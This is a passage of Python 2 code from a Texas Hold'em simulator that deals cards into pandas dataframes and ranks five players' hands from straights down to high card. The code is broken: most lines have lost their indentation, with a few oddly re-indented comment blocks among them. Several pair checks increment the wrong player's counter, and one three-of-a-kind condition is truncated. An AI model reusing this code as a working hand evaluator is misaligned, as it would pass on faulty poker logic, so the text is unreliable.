list[3] = df5.iloc[i * 4 + k - 1, 7]
list[4] = df5.iloc[i * 4 + k - 1, 9]
for m in range(0, 5):
if list[m] == 14:
list[m] = 1
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == \
list[4]:
a5 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
# With Ace High
for m in range(0, 5):
if list[m] == 1:
list[m] = 14
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == list[4]:
a5 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
                                        # Check for Straight: SF counts players whose five
                                        # ranks were sequential (ace tried both low and high);
                                        # a1..a5 hold each straight's top card (0 if none).
                                        if (SF > 0):
                                            print "Straight"
                                            b = max(a1, a2, a3, a4, a5)
                                            # Independent ifs: all players tied at b are flagged.
                                            if a1 == b:
                                                df1.iloc[i * 4 + k - 1, 14] = 1
                                            if a2 == b:
                                                df2.iloc[i * 4 + k - 1, 14] = 1
                                            if a3 == b:
                                                df3.iloc[i * 4 + k - 1, 14] = 1
                                            if a4 == b:
                                                df4.iloc[i * 4 + k - 1, 14] = 1
                                            if a5 == b:
                                                df5.iloc[i * 4 + k - 1, 14] = 1
else:
#Check for 3 of a kind
FH = 0
a1i = 0
a2i = 0
a3i = 0
a4i = 0
a5i = 0
# Evaluate for P1
list[0] = df1.iloc[i * 4 + k - 1, 1]
list[1] = df1.iloc[i * 4 + k - 1, 3]
list[2] = df1.iloc[i * 4 + k - 1, 5]
list[3] = df1.iloc[i * 4 + k - 1, 7]
list[4] = df1.iloc[i * 4 + k - 1, 9]
if list[0] == list[1] and list[1] == list[2]:
a1i = list[0]
FH = FH + 1
elif list[0] == list[1] and list[1] == list[3]:
a1i = list[0]
FH = FH + 1
elif list[0] == list[1] and list[1] == list[4]:
a1i = list[0]
FH = FH + 1
elif list[0] == list[3] and list[3] == list[2]:
a1i = list[0]
FH = FH + 1
elif list[0] == list[4] and list[4] == list[2]:
a1i = list[0]
FH = FH + 1
elif list[3] == list[1] and list[1] == list[2]:
a1i = list[3]
FH = FH + 1
elif list[4] == list[1] and list[1] == list[2]:
a1i = list[4]
FH = FH + 1
elif list[0] == list[3] and list[3] == list[4]:
a1i = list[0]
FH = FH + 1
elif list[3] == list[1] and list[1] == list[4]:
a1i = list[3]
FH = FH + 1
# Evaluate for P2
list[0] = df2.iloc[i * 4 + k - 1, 1]
list[1] = df2.iloc[i * 4 + k - 1, 3]
list[2] = df2.iloc[i * 4 + k - 1, 5]
list[3] = df2.iloc[i * 4 + k - 1, 7]
list[4] = df2.iloc[i * 4 + k - 1, 9]
if list[0] == list[1] and list[1] == list[2]:
a2i = list[0]
FH = FH + 1
elif list[0] == list[1] and list[1] == list[3]:
a2i = list[0]
FH = FH + 1
elif list[0] == list[1] and list[1] == list[4]:
a2i = list[0]
FH = FH + 1
elif list[0] == list[3] and list[3] == list[2]:
a2i = list[0]
FH = FH + 1
elif list[0] == list[4] and list[4] == list[2]:
a2i = list[0]
FH = FH + 1
elif list[3] == list[1] and list[1] == list[2]:
a2i = list[3]
FH = FH + 1
elif list[4] == list[1] and list[1] == list[2]:
a2i = list[4]
FH = FH + 1
elif list[0] == list[3] and list[3] == list[4]:
a2i = list[0]
FH = FH + 1
elif list[3] == list[1] and list[1] == list[4]:
a2i = list[3]
FH = FH + 1
# Evaluate for P3
list[0] = df3.iloc[i * 4 + k - 1, 1]
list[1] = df3.iloc[i * 4 + k - 1, 3]
list[2] = df3.iloc[i * 4 + k - 1, 5]
list[3] = df3.iloc[i * 4 + k - 1, 7]
list[4] = df3.iloc[i * 4 + k - 1, 9]
if list[0] == list[1] and list[1] == list[2]:
a3i = list[0]
FH = FH + 1
elif list[0] == list[1] and list[1] == list[3]:
a3i = list[0]
FH = FH + 1
elif list[0] == list[1] and list[1] == list[4]:
a3i = list[0]
FH = FH + 1
elif list[0] == list[3] and list[3] == list[2]:
a3i = list[0]
FH = FH + 1
elif list[0] == list[4] and list[4] == list[2]:
a3i = list[0]
FH = FH + 1
elif list[3] == list[1] and list[1] == list[2]:
a3i = list[3]
FH = FH + 1
elif list[4] == list[1] and list[1] == list[2]:
a3i = list[4]
FH = FH + 1
elif list[0] == list[3] and list[3] == list[4]:
a3i = list[0]
FH = FH + 1
elif list[3] == list[1] and list[1] == list[4]:
a3i = list[3]
FH = FH + 1
# Evaluate for P4
list[0] = df4.iloc[i * 4 + k - 1, 1]
list[1] = df4.iloc[i * 4 + k - 1, 3]
list[2] = df4.iloc[i * 4 + k - 1, 5]
list[3] = df4.iloc[i * 4 + k - 1, 7]
list[4] = df4.iloc[i * 4 + k - 1, 9]
if list[0] == list[1] and list[1] == list[2]:
a4i = list[0]
FH = FH + 1
elif list[0] == list[1] and list[1] == list[3]:
a4i = list[0]
FH = FH + 1
elif list[0] == list[1] and list[1] == list[4]:
a4i = list[0]
FH = FH + 1
elif list[0] == list[3] and list[3] == list[2]:
a4i = list[0]
FH = FH + 1
elif list[0] == list[4] and list[4] == list[2]:
a4i = list[0]
FH = FH + 1
elif list[3] == list[1] and list[1] == list[2]:
a4i = list[3]
FH = FH + 1
elif list[4] == list[1] and list[1] == list[2]:
a4i = list[4]
FH = FH + 1
elif list[0] == list[3] and list[3] == list[4]:
a4i = list[0]
FH = FH + 1
elif list[3] == list[1] and list[1] == list[4]:
a4i = list[3]
FH = FH + 1
# Evaluate for P5
list[0] = df5.iloc[i * 4 + k - 1, 1]
list[1] = df5.iloc[i * 4 + k - 1, 3]
list[2] = df5.iloc[i * 4 + k - 1, 5]
list[3] = df5.iloc[i * 4 + k - 1, 7]
list[4] = df5.iloc[i * 4 + k - 1, 9]
if list[0] == list[1] and list[1] == list[2]:
a5i = list[0]
FH = FH + 1
elif list[0] == list[1] and list[1] == list[3]:
a5i = list[0]
FH = FH + 1
elif list[0] == list[1] and list[1] == list[4]:
a5i = list[0]
FH = FH + 1
elif list[0] == list[3] and list[3] == list[2]:
a5i = list[0]
FH = FH + 1
elif list[0] == list[4] and list[4] == list[2]:
a5i = list[0]
FH = FH + 1
elif list[3] == list[1] and list[1] == list[2]:
a5i = list[3]
FH = FH + 1
elif list[4] == list[1] and list[1]:
a5i = list[4]
FH = FH + 1
elif list[0] == list[3] and list[3] == list[4]:
a5i = list[0]
FH = FH + 1
elif list[3] == list[1] and list[1] == list[4]:
a5i = list[3]
FH = FH + 1
# Evaluating for 3 of a kind
if (FH > 0):
print "3 of a kind"
if a1i == a2i and a1i != 0:
b = max (df1.iloc[i * 4 + k - 1, 1], df1.iloc[i * 4 + k - 1, 3],
df2.iloc[i * 4 + k - 1, 1], df2.iloc[i * 4 + k - 1, 3],)
if b == df1.iloc[i * 4 + k - 1, 1] or b == df1.iloc[i * 4 + k - 1, 3]:
df1.iloc[i * 4 + k - 1, 14] = 1
else:
df2.iloc[i * 4 + k - 1, 14] = 1
elif a1i == a3i and a1i != 0:
b = max (df1.iloc[i * 4 + k - 1, 1], df1.iloc[i * 4 + k - 1, 3],
df3.iloc[i * 4 + k - 1, 1], df3.iloc[i * 4 + k - 1, 3],)
if b == df1.iloc[i * 4 + k - 1, 1] or b == df1.iloc[i * 4 + k - 1, 3]:
df1.iloc[i * 4 + k - 1, 14] = 1
else:
df3.iloc[i * 4 + k - 1, 14] = 1
elif a1i == a4i and a1i != 0:
b = max (df1.iloc[i * 4 + k - 1, 1], df1.iloc[i * 4 + k - 1, 3],
df4.iloc[i * 4 + k - 1, 1], df4.iloc[i * 4 + k - 1, 3],)
if b == df1.iloc[i * 4 + k - 1, 1] or b == df1.iloc[i * 4 + k - 1, 3]:
df1.iloc[i * 4 + k - 1, 14] = 1
else:
df4.iloc[i * 4 + k - 1, 14] = 1
elif a1i == a5i and a1i != 0:
b = max (df1.iloc[i * 4 + k - 1, 1], df1.iloc[i * 4 + k - 1, 3],
df5.iloc[i * 4 + k - 1, 1], df5.iloc[i * 4 + k - 1, 3],)
if b == df1.iloc[i * 4 + k - 1, 1] or b == df1.iloc[i * 4 + k - 1, 3]:
df1.iloc[i * 4 + k - 1, 14] = 1
else:
df5.iloc[i * 4 + k - 1, 14] = 1
elif a2i == a3i and a2i != 0:
b = max (df2.iloc[i * 4 + k - 1, 1], df2.iloc[i * 4 + k - 1, 3],
df3.iloc[i * 4 + k - 1, 1], df3.iloc[i * 4 + k - 1, 3],)
if b == df2.iloc[i * 4 + k - 1, 1] or b == df2.iloc[i * 4 + k - 1, 3]:
df2.iloc[i * 4 + k - 1, 14] = 1
else:
df3.iloc[i * 4 + k - 1, 14] = 1
elif a2i == a4i and a2i != 0:
b = max(df2.iloc[i * 4 + k - 1, 1], df2.iloc[i * 4 + k - 1, 3],
df4.iloc[i * 4 + k - 1, 1], df4.iloc[i * 4 + k - 1, 3], )
if b == df2.iloc[i * 4 + k - 1, 1] or b == df2.iloc[i * 4 + k - 1, 3]:
df2.iloc[i * 4 + k - 1, 14] = 1
else:
df4.iloc[i * 4 + k - 1, 14] = 1
elif a2i == a5i and a2i != 0:
b = max(df2.iloc[i * 4 + k - 1, 1], df2.iloc[i * 4 + k - 1, 3],
df5.iloc[i * 4 + k - 1, 1], df5.iloc[i * 4 + k - 1, 3], )
if b == df2.iloc[i * 4 + k - 1, 1] or b == df2.iloc[i * 4 + k - 1, 3]:
df2.iloc[i * 4 + k - 1, 14] = 1
else:
df5.iloc[i * 4 + k - 1, 14] = 1
elif a3i == a4i and a3i != 0:
b = max(df3.iloc[i * 4 + k - 1, 1], df3.iloc[i * 4 + k - 1, 3],
df4.iloc[i * 4 + k - 1, 1], df4.iloc[i * 4 + k - 1, 3], )
if b == df3.iloc[i * 4 + k - 1, 1] or b == df3.iloc[i * 4 + k - 1, 3]:
df3.iloc[i * 4 + k - 1, 14] = 1
else:
df4.iloc[i * 4 + k - 1, 14] = 1
elif a3i == a5i and a3i != 0:
b = max(df3.iloc[i * 4 + k - 1, 1], df3.iloc[i * 4 + k - 1, 3],
df5.iloc[i * 4 + k - 1, 1], df5.iloc[i * 4 + k - 1, 3], )
if b == df3.iloc[i * 4 + k - 1, 1] or b == df3.iloc[i * 4 + k - 1, 3]:
df3.iloc[i * 4 + k - 1, 14] = 1
else:
df5.iloc[i * 4 + k - 1, 14] = 1
elif a4i == a5i and a4i != 0:
b = max(df4.iloc[i * 4 + k - 1, 1], df4.iloc[i * 4 + k - 1, 3],
df5.iloc[i * 4 + k - 1, 1], df5.iloc[i * 4 + k - 1, 3], )
if b == df4.iloc[i * 4 + k - 1, 1] or b == df4.iloc[i * 4 + k - 1, 3]:
df4.iloc[i * 4 + k - 1, 14] = 1
else:
df5.iloc[i * 4 + k - 1, 14] = 1
else:
b = max(a1i, a2i, a3i, a4i, a5i)
if a1i == b:
df1.iloc[i * 4 + k - 1, 14] = 1
elif a2i == b:
df2.iloc[i * 4 + k - 1, 14] = 1
elif a3i == b:
df3.iloc[i * 4 + k - 1, 14] = 1
elif a4i == b:
df4.iloc[i * 4 + k - 1, 14] = 1
elif a5i == b:
df5.iloc[i * 4 + k - 1, 14] = 1
else:
#Evaluate for two pair and one pair
f1 = [0]
f2 = [0]
f3 = [0]
f4 = [0]
f5 = [0]
a1 = [0]
a2 = [0]
a3 = [0]
a4 = [0]
a5 = [0]
Fin = 0
# Evaluate P1
TP1 = 0
list[0] = df1.iloc[i * 4 + k - 1, 1]
list[1] = df1.iloc[i * 4 + k - 1, 3]
list[2] = df1.iloc[i * 4 + k - 1, 5]
list[3] = df1.iloc[i * 4 + k - 1, 7]
list[4] = df1.iloc[i * 4 + k - 1, 9]
if (list[0] == list[2] or list[0] == list[3] or list[
0] == list[4]):
TP1 = TP1 + 1
f1.append(list[0])
if (list[1] == list[2] or list[1] == list[3] or list[1] == list[4]):
TP1 = TP1 + 1
f1.append(list[1])
if (list[0] == list[1]):
TP1 = TP1 + 1
f1.append(list[1])
if TP1 > 1:
f1 = np.sort(f1[::-1]).tolist()
a1.append(f1[0])
a1.append(f1[1])
Fin = Fin + 1
# Evaluate P2
TP2 = 0
list[0] = df2.iloc[i * 4 + k - 1, 1]
list[1] = df2.iloc[i * 4 + k - 1, 3]
list[2] = df2.iloc[i * 4 + k - 1, 5]
list[3] = df2.iloc[i * 4 + k - 1, 7]
list[4] = df2.iloc[i * 4 + k - 1, 9]
if (list[0] == list[2] or list[0] == list[3] or
list[0] == list[4]):
TP2 = TP2 + 1
f2.append(list[0])
if (list[1] == list[2] or list[1] == list[3] or list[1] == list[4]):
TP2 = TP2 + 1
f2.append(list[1])
if (list[0] == list[1]):
TP1 = TP1 + 1
f2.append(list[1])
if TP2 > 1:
f2 = np.sort(f2[::-1]).tolist()
a2.append(f2[0])
a2.append(f2[1])
Fin = Fin + 1
# Evaluate P3
TP3 = 0
list[0] = df3.iloc[i * 4 + k - 1, 1]
list[1] = df3.iloc[i * 4 + k - 1, 3]
list[2] = df3.iloc[i * 4 + k - 1, 5]
list[3] = df3.iloc[i * 4 + k - 1, 7]
list[4] = df3.iloc[i * 4 + k - 1, 9]
if (list[0] == list[2] or list[0] == list[
3] or list[0] == list[4]):
TP3 = TP3 + 1
f3.append(list[0])
if (list[1] == list[2] or list[1] == list[3] or list[1] == list[4]):
TP3 = TP3 + 1
f3.append(list[1])
if (list[0] == list[1]):
TP1 = TP1 + 1
f3.append(list[1])
if TP3 > 1:
f3 = np.sort(f3[::-1]).tolist()
a3.append(f3[0])
a3.append(f3[1])
Fin = Fin + 1
# Evaluate P4
TP4 = 0
list[0] = df4.iloc[i * 4 + k - 1, 1]
list[1] = df4.iloc[i * 4 + k - 1, 3]
list[2] = df4.iloc[i * 4 + k - 1, 5]
list[3] = df4.iloc[i * 4 + k - 1, 7]
list[4] = df4.iloc[i * 4 + k - 1, 9]
if (list[0] == list[2] or list[0] == list[
3] or list[0] == list[4]):
TP4 = TP4 + 1
f4.append(list[0])
if (list[1] == list[2] or list[1] == list[3] or list[1] == list[
4]):
TP4 = TP4 + 1
f4.append(list[1])
if (list[0] == list[1]):
TP1 = TP1 + 1
f4.append(list[1])
if TP4 > 1:
f4 = np.sort(f4[::-1]).tolist()
a4.append(f4[0])
a4.append(f4[1])
Fin = Fin + 1
# Evaluate P5
TP5 = 0
list[0] = df5.iloc[i * 4 + k - 1, 1]
list[1] = df5.iloc[i * 4 + k - 1, 3]
list[2] = df5.iloc[i * 4 + k - 1, 5]
list[3] = df5.iloc[i * 4 + k - 1, 7]
list[4] = df5.iloc[i * 4 + k - 1, 9]
if (list[0] == list[2] or list[0] ==
list[3] or list[0] == list[4]):
TP5 = TP5 + 1
f5.append(list[0])
if (list[1] == list[2] or list[1] == list[3] or list[1] ==
list[4]):
TP5 = TP5 + 1
f5.append(list[1])
if (list[0] == list[1]):
TP1 = TP1 + 1
f5.append(list[1])
if TP5 > 1:
f5 = np.sort(f5[::-1]).tolist()
a5.append(f5[0])
a5.append(f5[1])
Fin = Fin + 1
                                                #Check for two pair: Fin counts players whose two best
                                                # pair ranks were appended to a1..a5 (lists seeded with 0).
                                                if Fin > 0:
                                                    print "Two pair"
                                                    b = max(max(a1),max(a2),max(a3),max(a4),max(a5))
                                                    # NOTE(review): elif chain flags only the first
                                                    # player tied at b, while the one-pair branch below
                                                    # uses independent ifs - confirm which is intended.
                                                    if max(a1) == b:
                                                        df1.iloc[i * 4 + k - 1, 14] = 1
                                                    elif max(a2) == b:
                                                        df2.iloc[i * 4 + k - 1, 14] = 1
                                                    elif max(a3) == b:
                                                        df3.iloc[i * 4 + k - 1, 14] = 1
                                                    elif max(a4) == b:
                                                        df4.iloc[i * 4 + k - 1, 14] = 1
                                                    elif max(a5) == b:
                                                        df5.iloc[i * 4 + k - 1, 14] = 1
                                                #Check for one pair: any pair seen anywhere; fn holds
                                                # each player's pair ranks (0-seeded), best pair wins.
                                                elif TP1+TP2+TP3+TP4+TP5 > 0:
                                                    print "One pair"
                                                    b = max(max(f1),max(f2),max(f3),max(f4),max(f5))
                                                    if max(f1) == b:
                                                        df1.iloc[i * 4 + k - 1, 14] = 1
                                                    if max(f2) == b:
                                                        df2.iloc[i * 4 + k - 1, 14] = 1
                                                    if max(f3) == b:
                                                        df3.iloc[i * 4 + k - 1, 14] = 1
                                                    if max(f4) == b:
                                                        df4.iloc[i * 4 + k - 1, 14] = 1
                                                    if max(f5) == b:
                                                        df5.iloc[i * 4 + k - 1, 14] = 1
else:
#Find the high card
print "High Card"
winner = max(df1.iloc[i * 4 + k - 1, 1], df1.iloc[i * 4 + k - 1, 3],
df2.iloc[i * 4 + k - 1, 1], df2.iloc[i * 4 + k - 1, 3],
df3.iloc[i * 4 + k - 1, 1], df3.iloc[i * 4 + k - 1, 3],
df4.iloc[i * 4 + k - 1, 1], df4.iloc[i * 4 + k - 1, 3],
df5.iloc[i * 4 + k - 1, 1], df5.iloc[i * 4 + k - 1, 3], )
if df1.iloc[i * 4 + k - 1, 1] == winner or df1.iloc[
i * 4 + k - 1, 3] == winner:
df1.iloc[i * 4 + k - 1, 14] = 1
if df2.iloc[i * 4 + k - 1, 1] == winner or df2.iloc[
i * 4 + k - 1, 3] == winner:
df2.iloc[i * 4 + k - 1, 14] = 1
if df3.iloc[i * 4 + k - 1, 1] == winner or df3.iloc[
i * 4 + k - 1, 3] == winner:
df3.iloc[i * 4 + k - 1, 14] = 1
if df4.iloc[i * 4 + k - 1, 1] == winner or df4.iloc[
i * 4 + k - 1, 3] == winner:
df4.iloc[i * 4 + k - 1, 14] = 1
if df5.iloc[i * 4 + k - 1, 1] == winner or df5.iloc[
i * 4 + k - 1, 3] == winner:
df5.iloc[i * 4 + k - 1, 14] = 1
# Create Turn Round
if k == 3:
df1.loc[i * 4 + k - 1] = df1.loc[i * 4 + k - 2]
df2.loc[i * 4 + k - 1] = df2.loc[i * 4 + k - 2]
df3.loc[i * 4 + k - 1] = df3.loc[i * 4 + k - 2]
df4.loc[i * 4 + k - 1] = df4.loc[i * 4 + k - 2]
df5.loc[i * 4 + k - 1] = df5.loc[i * 4 + k - 2]
while x == 0:
print "Step 13"
#Generate 4th community card or the turn
df1.iloc[i * 4 + k - 1][10] = random.randrange(1, 5)
df1.iloc[i * 4 + k - 1][11] = random.randrange(2, 15)
df2.iloc[i * 4 + k - 1][10] = df1.iloc[i * 4 + k - 1][10]
df2.iloc[i * 4 + k - 1][11] = df1.iloc[i * 4 + k - 1][11]
df3.iloc[i * 4 + k - 1][10] = df1.iloc[i * 4 + k - 1][10]
df3.iloc[i * 4 + k - 1][11] = df1.iloc[i * 4 + k - 1][11]
df4.iloc[i * 4 + k - 1][10] = df1.iloc[i * 4 + k - 1][10]
df4.iloc[i * 4 + k - 1][11] = df1.iloc[i * 4 + k - 1][11]
df5.iloc[i * 4 + k - 1][10] = df1.iloc[i * 4 + k - 1][10]
df5.iloc[i * 4 + k - 1][11] = df1.iloc[i * 4 + k - 1][11]
# Check if this card is already generated in this game, then re-generate
if (df1.iloc[i * 4 + k - 1, 10] == df1.iloc[i * 4 + k - 1, 8] and df1.iloc[i * 4 + k - 1, 11] ==
df1.iloc[i * 4 + k - 1, 9]) \
or (df1.iloc[i * 4 + k - 1, 10] == df1.iloc[i * 4 + k - 1, 6] and df1.iloc[
i * 4 + k - 1, 11] == df1.iloc[i * 4 + k - 1, 7]) \
or (df1.iloc[i * 4 + k - 1, 10] == df1.iloc[i * 4 + k - 1, 4] and df1.iloc[
i * 4 + k - 1, 11] == df1.iloc[i * 4 + k - 1, 5]) \
or (df1.iloc[i * 4 + k - 1, 10] == df1.iloc[i * 4 + k - 1, 2] and df1.iloc[
i * 4 + k - 1, 11] == df1.iloc[i * 4 + k - 1, 3]) \
or (df1.iloc[i * 4 + k - 1, 10] == df1.iloc[i * 4 + k - 1, 0] and df1.iloc[
i * 4 + k - 1, 11] == df1.iloc[i * 4 + k - 1, 1])\
or (df1.iloc[i * 4 + k - 1, 10] == df2.iloc[i * 4 + k - 1, 2] and df1.iloc[
i * 4 + k - 1, 11] == df2.iloc[i * 4 + k - 1, 3])\
or (df1.iloc[i * 4 + k - 1, 10] == df3.iloc[i * 4 + k - 1, 2] and df1.iloc[
i * 4 + k - 1, 11] == df3.iloc[i * 4 + k - 1, 3])\
or (df1.iloc[i * 4 + k - 1, 10] == df4.iloc[i * 4 + k - 1, 2] and df1.iloc[
i * 4 + k - 1, 11] == df4.iloc[i * 4 + k - 1, 3])\
or (df1.iloc[i * 4 + k - 1, 10] == df5.iloc[i * 4 + k - 1, 2] and df1.iloc[
i * 4 + k - 1, 11] == df5.iloc[i * 4 + k - 1, 3]) \
or (df1.iloc[i * 4 + k - 1, 10] == df2.iloc[i * 4 + k - 1, 0] and df1.iloc[
i * 4 + k - 1, 11] == df2.iloc[i * 4 + k - 1, 1]) \
or (df1.iloc[i * 4 + k - 1, 10] == df3.iloc[i * 4 + k - 1, 0] and df1.iloc[
i * 4 + k - 1, 11] == df3.iloc[i * 4 + k - 1, 1]) \
or (df1.iloc[i * 4 + k - 1, 10] == df4.iloc[i * 4 + k - 1, 0] and df1.iloc[
i * 4 + k - 1, 11] == df4.iloc[i * 4 + k - 1, 1]) \
or (df1.iloc[i * 4 + k - 1, 10] == df5.iloc[i * 4 + k - 1, 0] and df1.iloc[
i * 4 + k - 1, 11] == df5.iloc[i * 4 + k - 1, 1]):
continue
else:
x = 1
#Evaluate turn round
list = [[-1,-1],
[-1, -1],
[-1, -1],
[-1,-1],
[-1, -1],
[-1, -1]]
df1.iloc[i * 4 + k - 1, 14] = 0
df2.iloc[i * 4 + k - 1, 14] = 0
df3.iloc[i * 4 + k - 1, 14] = 0
df4.iloc[i * 4 + k - 1, 14] = 0
df5.iloc[i * 4 + k - 1, 14] = 0
# Straight Flush Evaluation
SF = 0
a1 = 0
a2 = 0
a3 = 0
a4 = 0
a5 = 0
# P1 Evaluation
#With Ace Low
list[0] = [df1.iloc[i * 4 + k - 1, 1], df1.iloc[i * 4 + k - 1, 0]]
list[1] = [df1.iloc[i * 4 + k - 1, 3], df1.iloc[i * 4 + k - 1, 2]]
list[2] = [df1.iloc[i * 4 + k - 1, 5], df1.iloc[i * 4 + k - 1, 4]]
list[3] = [df1.iloc[i * 4 + k - 1, 7], df1.iloc[i * 4 + k - 1, 6]]
list[4] = [df1.iloc[i * 4 + k - 1, 9], df1.iloc[i * 4 + k - 1, 8]]
list[5] = [df1.iloc[i * 4 + k - 1, 11], df1.iloc[i * 4 + k - 1, 10]]
for m in range(0, 6):
if list[m][0] == 14:
list[m][0] = 1
list = sorted(list, key=lambda x: x[0])
if list[0][0] + 1 == list[1][0] and list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[
4][0] and list[0][1] == list[1][1] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1]:
a1 = max(list[0][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][0] and list[4][0] + 1 == list[
5][0] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and list[4][1] == list[5][1]:
a1 = max(list[5][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
# With Ace High
list[0] = [df1.iloc[i * 4 + k - 1, 1], df1.iloc[i * 4 + k - 1, 0]]
list[1] = [df1.iloc[i * 4 + k - 1, 3], df1.iloc[i * 4 + k - 1, 2]]
list[2] = [df1.iloc[i * 4 + k - 1, 5], df1.iloc[i * 4 + k - 1, 4]]
list[3] = [df1.iloc[i * 4 + k - 1, 7], df1.iloc[i * 4 + k - 1, 6]]
list[4] = [df1.iloc[i * 4 + k - 1, 9], df1.iloc[i * 4 + k - 1, 8]]
list[5] = [df1.iloc[i * 4 + k - 1, 11], df1.iloc[i * 4 + k - 1, 10]]
list = sorted(list, key=lambda x: x[0])
if list[0][0] + 1 == list[1][0] and list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[
4][0] and list[0][1] == list[1][1] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1]:
a1 = max(list[0][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][0] and list[4][0] + 1 == list[
5][0] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and list[4][1] == list[5][1]:
a1 = max(list[5][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
# P2 Evaluation
#With Ace Low
list[0] = [df2.iloc[i * 4 + k - 1, 1], df2.iloc[i * 4 + k - 1, 0]]
list[1] = [df2.iloc[i * 4 + k - 1, 3], df2.iloc[i * 4 + k - 1, 2]]
list[2] = [df2.iloc[i * 4 + k - 1, 5], df2.iloc[i * 4 + k - 1, 4]]
list[3] = [df2.iloc[i * 4 + k - 1, 7], df2.iloc[i * 4 + k - 1, 6]]
list[4] = [df2.iloc[i * 4 + k - 1, 9], df2.iloc[i * 4 + k - 1, 8]]
list[5] = [df2.iloc[i * 4 + k - 1, 11], df2.iloc[i * 4 + k - 1, 10]]
for m in range(0, 6):
if list[m][0] == 14:
list[m][0] = 1
list = sorted(list, key=lambda x: x[0])
if list[0][0] + 1 == list[1][0] and list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[
4][0] and list[0][1] == list[1][1] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1]:
a2 = max(list[0][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][0] and list[4][0] + 1 == list[
5][0] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and list[4][1] == list[5][1]:
a2 = max(list[5][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
# With Ace High
list[0] = [df2.iloc[i * 4 + k - 1, 1], df2.iloc[i * 4 + k - 1, 0]]
list[1] = [df2.iloc[i * 4 + k - 1, 3], df2.iloc[i * 4 + k - 1, 2]]
list[2] = [df2.iloc[i * 4 + k - 1, 5], df2.iloc[i * 4 + k - 1, 4]]
list[3] = [df2.iloc[i * 4 + k - 1, 7], df2.iloc[i * 4 + k - 1, 6]]
list[4] = [df2.iloc[i * 4 + k - 1, 9], df2.iloc[i * 4 + k - 1, 8]]
list[5] = [df2.iloc[i * 4 + k - 1, 11], df2.iloc[i * 4 + k - 1, 10]]
list = sorted(list, key=lambda x: x[0])
if list[0][0] + 1 == list[1][0] and list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[
4][0] and list[0][1] == list[1][1] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1]:
a2 = max(list[0][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][0] and list[4][0] + 1 == list[
5][0] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and list[4][1] == list[5][1]:
a2 = max(list[5][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
# P3 Evaluation
#With Ace Low
list[0] = [df3.iloc[i * 4 + k - 1, 1], df3.iloc[i * 4 + k - 1, 0]]
list[1] = [df3.iloc[i * 4 + k - 1, 3], df3.iloc[i * 4 + k - 1, 2]]
list[2] = [df3.iloc[i * 4 + k - 1, 5], df3.iloc[i * 4 + k - 1, 4]]
list[3] = [df3.iloc[i * 4 + k - 1, 7], df3.iloc[i * 4 + k - 1, 6]]
list[4] = [df3.iloc[i * 4 + k - 1, 9], df3.iloc[i * 4 + k - 1, 8]]
list[5] = [df3.iloc[i * 4 + k - 1, 11], df3.iloc[i * 4 + k - 1, 10]]
for m in range(0, 6):
if list[m][0] == 14:
list[m][0] = 1
list = sorted(list, key=lambda x: x[0])
if list[0][0] + 1 == list[1][0] and list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[
4][0] and list[0][1] == list[1][1] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1]:
a3 = max(list[0][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][0] and list[4][0] + 1 == list[
5][0] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and list[4][1] == list[5][1]:
a3 = max(list[5][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
# With Ace High
list[0] = [df3.iloc[i * 4 + k - 1, 1], df3.iloc[i * 4 + k - 1, 0]]
list[1] = [df3.iloc[i * 4 + k - 1, 3], df3.iloc[i * 4 + k - 1, 2]]
list[2] = [df3.iloc[i * 4 + k - 1, 5], df3.iloc[i * 4 + k - 1, 4]]
list[3] = [df3.iloc[i * 4 + k - 1, 7], df3.iloc[i * 4 + k - 1, 6]]
list[4] = [df3.iloc[i * 4 + k - 1, 9], df3.iloc[i * 4 + k - 1, 8]]
list[5] = [df3.iloc[i * 4 + k - 1, 11], df3.iloc[i * 4 + k - 1, 10]]
list = sorted(list, key=lambda x: x[0])
if list[0][0] + 1 == list[1][0] and list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[
